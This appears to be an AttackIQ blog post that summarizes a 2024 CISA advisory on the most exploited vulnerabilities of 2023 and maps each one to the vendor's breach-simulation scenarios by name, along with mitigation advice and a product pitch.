On November 12, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) released a Cybersecurity Advisory (CSA) providing details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). According to the CSA, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.

This recent alert was part of a collaboration effort between CISA, the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the Computer Emergency Response Team New Zealand (CERT NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK).

The recommendations that follow include a multitude of assessments for testing against many of the top routinely exploited vulnerabilities from 2023. While these recommendations are focused against many of the vulnerabilities mentioned in the CISA advisory, AttackIQ always encourages to adopt the Assume Breach practice, and look to test real-world adversary post-compromise tactics, techniques, and procedures (TTPs).

1. Citrix (CVE-2023-4966):

AttackIQ has previously emulated behaviors associated with the exploitation of this vulnerability. It is recommended to run the following emulation:

• Attack Graph: [CISA AA23-325A] #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability

2. MOVEit (CVE-2023-34362):

AttackIQ has previously emulated behaviors associated with the exploitation of this vulnerability. It is recommended to run the following emulations:

• Attack Graph: [CISA AA23-158A] #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability
• Scenario: PCAP Replay – MOVEit Transfer SQL Injection Vulnerability (CVE-2023-34362)
• Scenario: PCAP Replay – LEMURLOOT WebShell Exploiting MOVEit Transfer Vulnerability (CVE-2023-34362)

3. Apache (CVE-2021-44228):

AttackIQ has previously emulated behaviors associated with exploitation of this vulnerability. It is recommended to run the following emulations:

• Attack Graph: Log4Shell (CVE-2021-44228) – 2021-12-14 – Post-Compromise Example Attack Graph
• Scenario: Log4Shell (CVE-2021-44228) Signature-Based Web Request
• Scenario: Log4Shell (CVE-2021-44228) Signature-Based Web Request – VMWare Horizon
• Scenario: Log4Shell (CVE-2021-44228) Signature-Based Web Requests (multiple payloads)
• Scenario: PCAP Replay – Log4Shell exploit (CVE-2021-44228)
• Scenario: PCAP Replay – Exfiltrate AWS credentials over DNS using Log4Shell (CVE-2021-44228)
• Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via DNS Protocol
• Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via DNS Protocol (Exfiltrate AWS Credentials)
• Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via LDAP Protocol
• Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via LDAPS Protocol
• Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via WAF Bypass Technique (::- notation)
• Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via WAF Bypass Technique (Lower Lookup)

4. Zoho (CVE-2022-47966, CVE-2021-40539):

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of CVE-2022-47966.

• Attack Graph: [CISA AA23-250A] Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of CVE-2021-40539.

• Attack Graph: [CISA AA23-284A] #StopRansomware: AvosLocker Ransomware

5. PaperCut (CVE-2023-27350):

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of this vulnerability. Additionally, LockBit ransomware was observed being used by the Bl00dy Ransomware Gang, which AttackIQ released a full featured attack graph for.

• Scenario: PaperCut MF/NG SetupCompleted Authentication Bypass Web Request (CVE-2023-27350)
• Scenario: PCAP Replay – PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350) & PCAP Replay – PaperCut MF/NG Remote Code Execution (CVE-2023-27350)
• Scenario: PCAP Replay – PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)

6. Microsoft (CVE-2020-1472, CVE-2021-34473):

AttackIQ has existing scenarios to test the Microsoft ZeroLogon and ProxyShell vulnerabilities.

• Scenario: Zerologon Attack with Mimikatz
• Scenario: ProxyShell Exploit (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

7. Progress Telerik (CVE-2019-18935):

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of this vulnerability.

• Attack Graph: [CISA AA23-074A] Multiple Actors Exploit Telerik Vulnerability to Deploy Webshells and Backdoors

8. Red Hat (CVE-2021-4034):

AttackIQ has the following scenario to test this vulnerability.

• Scenario: Pwnkit Local Privilege Escalation

9. Atlassian (CVE-2022-26134):

AttackIQ has the following scenario to test this vulnerability.

• Scenario: PCAP Replay – Confluence Remote Code Execution (CVE-2022-26134)

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by these threats, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends reviewing CISA’s recommendations and focusing on the techniques emulated in our previously released assessment template.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a considerable number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations to adapt them to your environment first to determine if you have any existing impact before reviewing the assessment results.

Wrap-up

In summary, the recommendations as described in this post are a good starting point for evaluating the effectiveness of your security personnel, processes and controls against these and similar threats. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against commonly used vulnerabilities.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.